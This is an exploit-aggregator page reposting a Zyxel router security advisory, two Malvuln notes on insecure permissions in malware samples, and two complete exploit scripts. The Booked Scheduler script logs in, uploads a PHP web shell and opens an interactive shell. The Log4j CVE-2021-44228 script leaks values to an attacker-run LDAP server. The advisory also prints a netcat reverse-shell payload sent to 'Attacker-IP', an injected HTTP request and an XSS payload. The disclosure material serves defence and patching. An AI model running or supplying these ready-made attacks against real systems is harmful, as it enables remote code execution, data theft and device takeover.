Latest exploits :: CodePwn

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220215-0 > ======================================================================= title: Multiple Critical Vulnerabilities product: Multiple Zyxel devices vulnerable version: For affected products see "Solution" section fixed version: see "Solution" section CVE number: - impact: Critical homepage: https://www.zyxel.com found: 2020-11-27 by: G. Hechenberger (Office Vienna) S. Robertz (Office Vienna) S. Viehböck (Office Vienna) T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Focused on innovation and customer-centricity, Zyxel Communications Corp. has been connecting people to the internet for nearly 30 years. We keep promoting creativity which meets the needs of customers. This spirit has never been changed since we developed the world's first integrated 3-in-1 data/fax/voice modem in 1992. Our ability to adapt and innovate with networking technology places us at the forefront of understanding connectivity for telco/service providers, businesses and home users. We're building the networks of tomorrow, helping unlock the world's potential and meeting the needs of the modern workplace; powering people at work, life and play. We stand side-by-side with our customers and partners to share new approaches to networking that will unleash their abilities. Loyal friend, powerful ally, reliable resource — we are Zyxel, Your Networking Ally." Source: https://www.zyxel.com/about_zyxel/company_overview.shtml Business recommendation: ------------------------ SEC Consult recommends Zyxel customers to upgrade the firmware to the latest version available. The collaboration between Zyxel Communications and SEC Consult will further strengthen Zyxel's cybersecurity strategy by accelerating and optimizing the ability to respond to threats and vulnerabilities like those described in this advisory. https://sec-consult.com/blog/detail/zyxel-communications-and-sec-consult-reach-next-level-of-cybersecurity/ Vulnerability overview/description: ----------------------------------- 1) Multiple Unauthenticated Buffer Overflows in zhttpd and libclinkc.so Multiple unauthenticated buffer overflows have been discovered in the zhttpd web server. One buffer overflow is extremely simple to trigger as it occurs in the URI input. In case of an overlong input, the web server crashes as the return address is overwritten with the input values as the function scanf() without length check was used. Multiple other buffer overflows can be found in the fol- lowing functionalities: * URI parsing in libclinkc.so, if '?' is contained. * Export_Log functionality. An attacker can take over the device by using the return-to-zero-protection technique as ASLR in the used Linux kernel is activated system-wide and the NX bit is set for the web server binary. Other protection mechanisms like PIE, stack canaries and relocation read only were not set. The address of libc shifts due to ASLR and must be brute-forced therefore. This can take up to one hour. However, on average, an attacker will gain a root shell in less than 30 minutes. 2) Unauthenticated Local File Disclosure in zhttpd An endpoint in zhttpd can be used to expose system files including "/etc/passwd" and "/etc/shadow". This endpoint is accessible without prior login. An attacker can read all files on the system by using this endpoint. 3) Unsafe Storage of Sensitive Data The device configuration contains passwords stored in a reversible form. Rather than storing passwords in an appropriate cryptographic hash format, the passwords are encrypted with a symmetric cipher (AES) using a static key. An attacker with access to the device configuration (e.g. by exploiting vulnerability #2) can decrypt the passwords and use them in further attacks. 4) Authenticated Command Injection Two command injections were found within the device. One was identified in the ping diagnostic tool, the other one at the certificate upload. Both led to a fully compromised system as the web service was started with root permissions. It is suspected that more command injections are present in the web interface of the device. 5) Broken Access Control Various access control vulnerabilities were identified where a lower privileged user can access functionality of a higher privilege role. Some functionality is visible in the GUI only if using a user account with full access permissions. However, it is not visible as standard "admin" user with the role administrator. It can be exploited, e.g., to open ports for system services such as SSH and FTP and also to access other functionality intended to be used by users with full access only. 6) Processing of Symbolic Links in ftpd The FTP server on the device processes symbolic links on external storage media, e.g. formatted as NTFS. By creating a symbolic link to the root directory, this can be abused to get read access to the root file system. 7) Inadequate CSRF Implementation The web interface provides CSRF tokens, which are implemented as 9-digit numbers and are transmitted as "sessionkey" parameter. CSRF tokens rely on unpredictability to fulfill their function. However, an API endpoint exists on the device, which can be used in an unauthenticated manner to generate and retrieve a new and valid CSRF token value over the internal network. 8) Stored Cross-Site Scripting A stored cross-site scripting vulnerability was identified in the printer name field of the print server menu within the web interface of the device. However, the possible payload is limited to 32 characters and certain tags. Proof of concept: ----------------- 1) Multiple Unauthenticated Buffer Overflows in zhttpd and libclinkc.so URI parsing pseudo code in zhttpd: ------------------------------------------------------------------------------- char path [256]; [...] __s = (char *)cg_http_request_geturi(param_1); pcVar2 = strstr(__s,"Export_Log"); if (pcVar2 != (char *)0x0) { __isoc99_sscanf(__s,"%*[^?]?%s",path); return; } ------------------------------------------------------------------------------- This code will copy everything following a '?' from the URI to a 256 byte buffer. As URIs are commonly allowed to contain 2048 characters, the 'path' buffer can be overflown. Proof of concept exploit that will obtain a root shell: ------------------------------------------------------------------------------- < the remote root exploit has been removed from this advisory and will be published at a later date > ------------------------------------------------------------------------------- URI handling pseudo code, when '?' is present, in libclinkc.so, which is called from zhttpd: ------------------------------------------------------------------------------- char acStack144 [128]; pcVar2 = strchr(uri_ptr,'?'); if (pcVar2 != (char *)0x0) { memset(acStack144,0,0x80); strncpy(acStack144,uri_ptr,(size_t)(pcVar2 + -(int)uri_ptr)); ------------------------------------------------------------------------------- This buffer can be overflown even though strncpy is used, as the copy length parameter 'n' is user controlled. The attacker will need to request a URL with more than 128 characters and will then append a '?'. 2) Unauthenticated Local File Disclosure in zhttpd The endpoint "Export_Log" can be used to fetch arbitrary files as shown in the following request that accesses the config file "/data/zcfg_config.json": ------------------------------------------------------------------------------- < POC removed from this advisory > ------------------------------------------------------------------------------- This endpoint is accessible without prior authentication! The file '/data/zcfg_config.json' will contain the running configuration of the router, including all passwords such as SIP credentials! 3) Unsafe Storage of Sensitive Data There is a proprietary password format by Zyxel denoted by the prefix "_encrypt_". This is implemented by the function encryptPassword in the binary "/bin/zcmd". Values in the configuration fields named "Privilege", "Password", "DefaultPassword" and "OldDefaultPassword" are passed to a function that derives an AES key using the OpenSSL function EVP_BytesToKey from static data. The following code snippets are a re-implementation of the key derivation algorithm. The key has been removed from this advisory. ------------------------------------------------------------------------------- unsigned char salt[] = { 0xXX,0xXX,0xXX,0xXX,0xXX,0xXX,0xXX,0xXX }; int encrypt_key_length; char encryptKey[]= "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; encrypt_key_length = strlen(encryptKey); unsigned char key[EVP_MAX_KEY_LENGTH], iv[EVP_MAX_IV_LENGTH]; int datal = encrypt_key_length; EVP_BytesToKey(EVP_aes_256_cbc(), EVP_sha1(), (const unsigned char*)salt, (const unsigned char*)encryptKey, datal,5,key,iv); for (int i = 0;i <= EVP_MAX_KEY_LENGTH;i++) { printf("%02X", key[i]); } printf("\n"); for (int i = 0;i <= EVP_MAX_IV_LENGTH;i++) { printf("%02X", iv[i]); } ------------------------------------------------------------------------------- The input for the key derivation is static, so the resulting key and IV are too. Based on the information the following Python snippet was developed that decrypts password entries (the key has been removed from this advisory): ------------------------------------------------------------------------------- def decrypt_zyxel_encrypt(input): key=bytearray.fromhex( 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') iv=bytearray.fromhex('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') input=input.replace('_encrypt_','') decoded = b64decode(input) aes = AES.new(key, AES.MODE_CBC,iv) decrypted=aes.decrypt(decoded) print(repr(decrypted)) ------------------------------------------------------------------------------- Decrypting the password can be done with the following command: >> decrypt_zyxel_encrypt('_encrypt_xxxxxxxxxxxxxxxxx==') The same password algorithm was discussed in the context of security research on the Zyxel VMG8825-T50 before: https://th0mas.nl/2020/03/26/getting-root-on-a-zyxel-vmg8825-t50-router/ 4) Authenticated Command Injection The input vulnerable to command injection can be found in the menu at MENU->Maintenance->Diagnostic. The following payload can now be used in the IP address field to create a reverse shell: 127.0.0.1;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc Attacker-IP Attacker-Port >/tmp/f & The second identified possibility for a command injection was the certificate upload. The endpoint is not visible from the UI for a regular user, however due to the broken access control, see 6), every user can interact with it. ------------------------------------------------------------------------------- POST /cgi-bin/Certificates?action=import_local&priv=;touch${IFS}foo&sessionkey=409106100 HTTP/1.1 Host: <IP> Connection: close Content-Length: 1498 Content-Type: multipart/form-data; boundary=---- WebKitFormBoundarywlxAsQZ1maK9V9E9 Accept: */* Origin: https://<IP> Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://<IP>/Certificates Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: Session=uUgQobZKw5cUzesePtCAGhyxH3SOCE8W ------WebKitFormBoundarywlxAsQZ1maK9V9E9 Content-Disposition: form-data; name="certImportFileName"; filename="ZyXELcert.crt" Content-Type: application/pkix-cert -----BEGIN CERTIFICATE----- [...] -----END CERTIFICATE----- ------WebKitFormBoundarywlxAsQZ1maK9V9E9— ------------------------------------------------------------------------------- 5) Broken Access Control As a first example, available user accounts and their privileges can be viewed by sending a request the following API endpoint: https://<IP>/cgi-bin/DAL?oid=login_privilege The response shows usernames invisible in the GUI, here e.g., the "root" user. ------------------------------------------------------------------------------- HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: application/json Content-Length: 2906 Date: Thu, 01 Jan 1970 22:59:49 GMT X-Frame-Options: sameorigin Content-Security-Policy: frame-ancestors 'self' X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block { "result": "ZCFG_SUCCESS", "ReplyMsg": "Page", "ReplyMsgMultiLang": "", "Object": [ { "Index0": 1, "Index1": 1, "Enabled": true, "Username": "root", "Password": "", "EnableQuickStart": true, "Privilege": "login" }, [...] ------------------------------------------------------------------------------- As a second example, the status of system services can be viewed by sending a request to the following API endpoint: https://<IP>/cgi-bin/DAL?oid=mgmt_srv The response shows various system services, here e.g., the SSH service which is only open for a trusted domain ("Trust_Dm"). ------------------------------------------------------------------------------- HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: application/json Content-Length: 1271 Date: Thu, 01 Jan 1970 02:18:28 GMT X-Frame-Options: sameorigin Content-Security-Policy: frame-ancestors 'self' X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block { "result": "ZCFG_SUCCESS", "ReplyMsg": "RestartDeamon", "ReplyMsgMultiLang": "", "Object": [ [...] { "Index": 5, "Name": "SSH", "Port": 22, "Mode": "Trust_Dm", "BoundInterfaceList": "IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,, ,,IP.Interface.11," }, [...] ------------------------------------------------------------------------------- Subsequently, services can also be opened. An example request to open the FTP, SSH and SNMP ports is given below. The request has to be sent in context of an "admin" user and has to contain a valid "sessionkey" value. ------------------------------------------------------------------------------- PUT /cgi-bin/DAL?oid=mgmt_srv&sessionkey=575595380 HTTP/1.1 Host: <IP> Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 If-Modified-Since: Thu, 01 Jun 1970 00:00:00 GMT X-Requested-With: XMLHttpRequest Content-Length: 2097 Origin: https://<IP> Connection: close Referer: https://<IP>/RemoteManagement Cookie: Session=6snfyaikMK5FmMcerni8cJEnzl4IgaFc [ { "Index": 1, "Name": "HTTP", "Port": 80, "Mode": "LAN_ONLY", "BoundInterfaceList": "IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,, ,,IP.Interface.11,,,,", "LANEnable": true, "WLANEnable": true, "WANEnable": false, "TrustDmEnable": false, "Protocol": "https", "RestartDeamon": false }, { "Index": 2, "Name": "HTTPS", "Port": 443, "Mode": "LAN_TstDm", "BoundInterfaceList": "IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,, ,,IP.Interface.11,,,,", "LANEnable": true, "WLANEnable": true, "WANEnable": false, "TrustDmEnable": true, "Protocol": "https", "RestartDeamon": false }, { "Index": 3, "Name": "FTP", "Port": 21, "Mode": "LAN_ONLY", "BoundInterfaceList": "IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,, ,,IP.Interface.11,,,,", "LANEnable": true, "WLANEnable": true, "WANEnable": false, "TrustDmEnable": false, "Protocol": "https", "RestartDeamon": false }, { "Index": 4, "Name": "TELNET", "Port": 23, "Mode": "", "BoundInterfaceList": "IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,, ,,IP.Interface.11,,,,", "LANEnable": true, "WLANEnable": true, "WANEnable": false, "TrustDmEnable": false, "Protocol": "https", "RestartDeamon": false }, { "Index": 5, "Name": "SSH", "Port": 22, "Mode": "LAN_TstDm", "BoundInterfaceList": "IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,, ,,IP.Interface.11,,,,", "LANEnable": true, "WLANEnable": true, "WANEnable": false, "TrustDmEnable": true, "Protocol": "https", "RestartDeamon": false }, { "Index": 6, "Name": "SNMP", "Port": 161, "Mode": "LAN_ONLY", "BoundInterfaceList": "IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,, ,,IP.Interface.11,,,,", "LANEnable": true, "WLANEnable": true, "WANEnable": false, "TrustDmEnable": false, "Protocol": "https", "RestartDeamon": false }, { "Index": 7, "Name": "PING", "Port": -1, "Mode": "LAN_TstDm", "BoundInterfaceList": "IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,, ,,IP.Interface.11,,,,", "LANEnable": true, "WLANEnable": true, "WANEnable": false, "TrustDmEnable": true, "Protocol": "https", "RestartDeamon": false, "origport": 443, "otherorigport": 80, "httpport": 80, "httpsport": 443 } ] ------------------------------------------------------------------------------- The response will indicate success and the system will be restarted. Another request to the API endpoint used before to query the service status will list the changed SSH mode, now shown as "LAN_TstDm". 6) Processing of Symbolic Links in ftpd A prepared USB stick, formatted as NTFS and containing a link to the root file system (created by executing "ln -s / sysroot") is needed to exploit this vul- nerability. After placing the USB stick in the USB port of the device, it is automatically mounted to the admin user's home directory. By using the access control vulne- rability, described in 6), the FTP port can be opened to allow FTP access via the internal network. After connecting to the FTP service using the "admin" credentials, the mounted USB stick can be accessed and the "sysroot" symbolic link will show the content of the root file system. 7) Inadequate CSRF Implementation The following API endpoint can be used without authentication to retrieve a new CSRF token: https://<IP>/changeSessionKey The response contains the new session key, valid for all user accounts. The current one will be invalidated. ------------------------------------------------------------------------------- HTTP/1.1 200 OK Content-Type: application/json Content-Length: 43 Date: Thu, 01 Jan 1970 12:29:50 GMT X-Frame-Options: sameorigin Content-Security-Policy: frame-ancestors 'self' X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block [ { "SessionKey": 583723980 } ] ------------------------------------------------------------------------------- 8) Stored Cross-Site Scripting By browsing to "MENU->Network Setting->USB Service->Print Server", the field "User Defined Printer Name" can be used to place a stored cross-site scripting payload. The following code was used as proof-of-concept: P<img src=x onerror=alert('XSS')> In a PUT request, this action looks like the following listing in the proxy: ------------------------------------------------------------------------------- PUT /cgi-bin/DAL?oid=print_server&sessionkey=578218320 HTTP/1.1 Host: <IP> Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 If-Modified-Since: Thu, 01 Jun 1970 00:00:00 GMT X-Requested-With: XMLHttpRequest Content-Length: 106 Origin: <IP> Connection: close Cookie: activeMenuID=maintain_settings; activeSubmenuID=log; Session=Fg2kSHIfZW5mhySEY4vJfrElXE4TSLEl { "Enable":false, "IppMake":"PRINTER", "IppDevice":"/dev/printer0", "IppName":"P<img src=x onerror=alert('XSS')>" } ------------------------------------------------------------------------------- The printer name will be stored and displayed on the same page, executing the payload. Vulnerable / tested versions: ----------------------------- Multiple devices are affected. See section "solution" for the list of affected models provided by the vendor including the patched firmware version. All firmware older than those listed are affected. Vendor contact timeline: ------------------------ 2021-01-21 | Contacting vendor via security@zyxel.com.tw. Received confirmation from Zyxel employee. 2021-02-09 | Zyxel confirms vulnerabilities and is working on a fix. Zyxel asks for more time; extended advisory disclosure date to 2021-05-20. 2021-04-09 | Asked for an update. 2021-04-13 | Zyxel stated that updates on the issues will be provided soon. 2021-04-28 | Phone call with Zyxel. Zyxel contact stated that all issues were resolved. 2021-05-01 | Zyxel stated that a status update will follow in the next weeks. 2021-05-19 | Zyxel PSIRT sent a list with feedback to all discovered issues. 2021-06-01 | Zyxel PSIRT updated the list and added a patch plan including timing. Updates the earliest updates on the security issues were scheduled for Q3 2021. 2021-09-02 | Status meeting with Zyxel. The advisory disclosure shifts back to Q4 2021 due to more affected products. 2021-11-07 | Security advisory disclosure plan discussion with Zyxel. Vendor stated that more products must be internally reviewed. The advisory can be released in Q1 2022 if no further devices are affected . 2022-01-25 | Asking vendor regarding coordinated advisory release date. 2022-02-03 | Asking vendor again for a status update. 2022-02-07 | Vendor reply that affected models are still being consolidated. 2022-02-10 | Received final list of affected models. 2022-02-15 | Zyxel publishes their security advisory. 2022-02-15 | Coordinated release of security advisory. Solution: --------- Install the current version of the firmware for the affected product. According to the vendor, the following firmware versions fix the identified security issues: Affected EOL products (list not necessarily complete) which will not get an update: AMG1302-T11C EOL VMG3925-B10C EOL VMG8924-B10D EOL VMG1312-B10D EOL VMG3312-T20A EOL VMG3625-T20A EOL VMG3925-B10B EOL VMG3925-B10C EOL VMG3925-B30C EOL VMG3926-B10A EOL VMG5313-B10B EOL VMG5313-B30B EOL VMG8623-T50A EOL VMG8823-B10B EOL VMG8823-B30B EOL VMG8823-B50B EOL VMG8823-B60B EOL VMG8924-B10D EOL VMG8924-B30D EOL PMG5317-T20A EOL Affected product Model / Patch availability CPE: DX3301-T0 V5.50(ABVY.3)C0 in Sep. 2022* DX5401-B0 V5.17(ABYO.1)C0* EMG3525-T50B EMEA - V5.50(ABPM.6)C0* S. America - V5.50(ABSL.0)b12 in Sep. 2022* EMG5523-T50B EMEA - V5.50(ABPM.6)C0* S. America - V5.50(ABSL.0)b12 in Sep. 2022* EMG5723-T50K V5.50(ABOM.7)C0* EX3301-T0 V5.50(ABVY.3)C0 in Sep. 2022* EX5401-B0 V5.17(ABYO.1)C0* EX5501-B0 V5.17(ABRY.2)C0* LTE3301-PLUS V1.00(ABQU.3)C0* LTE7240-M403 V2.00(ABMG.4)C0* VMG1312-T20B V5.50(ABSB.5)C0* VMG3625-T50B V5.50(ABPM.6)C0* VMG3927-B50A V5.17(ABMT.6)C0* VMG3927-B60A V5.17(ABMT.6)C0* VMG3927-T50K V5.50(ABOM.7)C0* VMG4005-B50A V5.15(ABQA.2)C0 in Mar. 2022* VMG8623-T50B V5.50(ABPM.6)C0* VMG8825-B50A V5.17(ABMT.6)C0* VMG8825-B50B V5.17(ABNY.7)C0* VMG8825-B60A V5.17(ABMT.6)C0* VMG8825-B60B V5.17(ABNY.7)C0* VMG8825-T50K V5.50(ABOM.7)C0* XMG3927-B50A V5.17(ABMT.6)C0* XMG8825-B50A V5.17(ABMT.6)C0* Firewall: VPN2S V1.20(ABLN.2)_00210319C1* ONT: AX7501-B0 V5.17(ABPC.1)C0* EP240P V5.40(ABVH.1)C0 in May 2022* PMG5317-T20B V5.40(ABKI.4)C0 in Apr. 2022* PMG5617GA V5.40(ABNA.2)C0 in Apr. 2022* PMG5622GA V5.40(ABNB.2)C0 in Apr. 2022* WiFi extender: WX3100-T0 V5.50(ABVL.1)C0 in Mar. 2022* WX3401-B0 V5.17(ABVE.1)C0* WiFi system: WSQ50 (Multy X) V2.20(ABKJ.7)C0 WSQ60 (Multy Plus) V2.20(ABND.8)C0 *Please reach out to your local Zyxel support team for the updated firmware file. For further information, please see the vendor's advisory as well: https://www.zyxel.com/support/Zyxel-security-advisory-for-multiple-vulnerabilities.shtml Page from the vendor regarding affected devices: https://www.zyxel.com/support/Zyxel-security-advisory-for-multiple-vulnerabilities_Products.shtml Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF G. Hechenberger, S. Robertz, S. Viehböck, T. Weber / @2022 </code></pre>

<pre><code># Exploit Title: Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated) # Vulnerability founder: AkkuS # Date: 13/12/2021 # Exploit Author: 0sunday # Vendor Homepage: https://www.bookedscheduler.com/ # Software Link: N/A # Version: Booked Scheduler 2.7.5 # Tester on: Kali 2021.2 # CVE: CVE-2019-9581 #!/usr/bin/python3 import sys import requests from random import randint def login(): login_payload = { "email": username, "password": password, "login": "submit", #"language": "en_us" } login_req = request.post( target+"/booked/Web/index.php", login_payload, verify=False, allow_redirects=True ) if login_req.status_code == 200: print ("[+] Logged in successfully.") else: print ("[-] Wrong credentials !") exit() return login_req.text.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1] def upload_shell(csrf): boundary = str(randint(123456789012345678901234567890, 999999999999999999999999999999)) _headers ={ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept-Language": "en-US,en;q=0.5", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------"+boundary, "Origin": target, "Connection": "close", "Referer": target + "/booked/Web/admin/manage_theme.php?update" } data = "-----------------------------"+boundary+"\r\n" data += "Content-Disposition: form-data; name=\"LOGO_FILE\"\r\n\n\n" data += "-----------------------------"+boundary+"\r\n" data += "Content-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"simple_shell.php\"\r\n" data += "Content-Type: application/x-php\r\n\n" data += "<?php $o = system($_REQUEST[\"cmd\"]);die?>\r\n\n" data += "-----------------------------"+boundary+"\r\n" data += "Content-Disposition: form-data; name=\"CSS_FILE\"\r\n\n\n" data += "-----------------------------"+boundary+"\r\n" data += "Content-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\n" data += csrf + "\r\n" data += "-----------------------------"+boundary+"--\r\n" # In case you need some debugging _proxies = { 'http': 'http://127.0.0.1:8080' } upload_req = request.post( target+"/booked/Web/admin/manage_theme.php?action=update", headers = _headers, data = data #proxies=_proxies ) def shell(): shell_req = request.get(target+"/booked/Web/custom-favicon.php") if shell_req.status_code == 200: print("[+] Uploaded shell successfully") print("[+] " + target + "/booked/Web/custom-favicon.php?cmd=") else: print("[-] Shell uploading failed") exit(1) print() cmd = '' while(cmd != 'exit'): cmd = input("$ ") shell_req = request.get(target+"/booked/Web/custom-favicon.php" + '?cmd='+cmd) print(shell_req.text) if len(sys.argv) != 4: print ("[+] Usage : "+ sys.argv[0] + " https://target:port username password") exit() target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] request = requests.session() csrf = login() upload_shell(csrf) shell() </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/fe0dacbc953d4301232b386fcb3afc23.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Trojan-Spy.Win32.Zbot.aawo.Zeus-Builder Vulnerability: Insecure Permissions Description: ZeuS Builder saves PE files to the c drive with insecure permissions granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. Type: PE32 MD5: fe0dacbc953d4301232b386fcb3afc23 Vuln ID: MVID-2022-0493 Disclosure: 02/16/2022 Exploit/PoC: ZeuS Builder Config and loader building Loading config from file 'C:\Users\Victim\Desktop\config2.txt'... Loading succeeded! Building bot file... botnet=test timer_config=120000ms, 60000ms timer_logs=120000ms, 60000ms timer_stats=120000ms, 60000ms url_config=http://192.168.1.100/web/cfg_test.bin url_compip=http://myip.ru encryption_key=OK Build succeeded! C:\>cacls ldr_test.exe C:\ldr_test.exe BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R NT AUTHORITY\Authenticated Users:(ID)C C:\>dir ldr_test.exe Volume in drive C has no label. Directory of C:\ 02/14/2022 03:19 AM 61,440 ldr_test.exe 1 File(s) 61,440 bytes 0 Dir(s) 26,621,710,336 bytes free Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code># Exploit Title: Apache Log4j2 2.14.1 - Information Disclosure # Date: 12/12/2021 # Exploit Author: leonjza # Vendor Homepage: https://logging.apache.org/log4j/2.x/ # Version: <= 2.14.1 # CVE: CVE-2021-44228 #!/usr/bin/env python3 # Pure python ENV variable leak PoC for CVE-2021-44228 # Original PoC: https://twitter.com/Black2Fan/status/1470281005038817284 # # 2021 @leonjza import argparse import socketserver import threading import time import requests LDAP_HEADER = b'\x30\x0c\x02\x01\x01\x61\x07\x0a\x01\x00\x04\x00\x04\x00\x0a' class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler): def handle(self) -> None: print(f' i| new connection from {self.client_address[0]}') sock = self.request sock.recv(1024) sock.sendall(LDAP_HEADER) data = sock.recv(1024) data = data[9:] # strip header # example response # # ('Java version 11.0.13\n' # '\x01\x00\n' # '\x01\x03\x02\x01\x00\x02\x01\x00\x01\x01\x00\x0b' # 'objectClass0\x00\x1b0\x19\x04\x172.16.840.1.113730.3.4.2') data = data.decode(errors='ignore').split('\n')[0] print(f' v| extracted value: {data}') class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer): pass def main(): parser = argparse.ArgumentParser(description='a simple log4j <=2.14 information disclosure poc ' '(ref: https://twitter.com/Black2Fan/status/1470281005038817284)') parser.add_argument('--target', '-t', required=True, help='target uri') parser.add_argument('--listen-host', default='0.0.0.0', help='exploit server host to listen on (default: 127.0.0.1)') parser.add_argument('--listen-port', '-lp', default=8888, help='exploit server port to listen on (default: 8888)') parser.add_argument('--exploit-host', '-eh', required=True, default='127.0.0.1', help='host where (this) exploit server is reachable') parser.add_argument('--leak', '-l', default='${java:version}', help='value to leak. ' 'see: https://twitter.com/Rayhan0x01/status/1469571563674505217 ' '(default: ${java:version})') args = parser.parse_args() print(f' i| starting server on {args.listen_host}:{args.listen_port}') server = ThreadedTCPServer((args.listen_host, args.listen_port), ThreadedTCPRequestHandler) serv_thread = threading.Thread(target=server.serve_forever) serv_thread.daemon = True serv_thread.start() time.sleep(1) print(f' i| server started') payload = f'${{jndi:ldap://{args.exploit_host}:{args.listen_port}/{args.leak}}}' print(f' i| sending exploit payload {payload} to {args.target}') try: r = requests.get(args.target, headers={'User-Agent': payload}) print(f' i| response status code: {r.status_code}') print(f' i| response: {r.text}') except Exception as e: print(f' e| failed to make request: {e}') finally: server.shutdown() server.server_close() if __name__ == '__main__': main() </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/8201ba6b542fc91c004110b2fc5395aa.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Prosti.b Vulnerability: Insecure Permissions Description: The malware writes a ".dll" PE file with insecure permissions under c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. Type: PE32 MD5: 8201ba6b542fc91c004110b2fc5395aa Vuln ID: MVID-2022-0492 Disclosure: 02/16/2022 Exploit/PoC: C:\>cacls Backdoor.dll C:\Backdoor.dll BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R NT AUTHORITY\Authenticated Users:(ID)C C:\>dir Backdoor.dll Volume in drive C has no label. Directory of C:\ 02/13/2022 02:33 AM 117,248 Backdoor.dll 1 File(s) 117,248 bytes 0 Dir(s) 26,682,523,648 bytes free C:\>type Backdoor.dll MZP ╕ @ Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

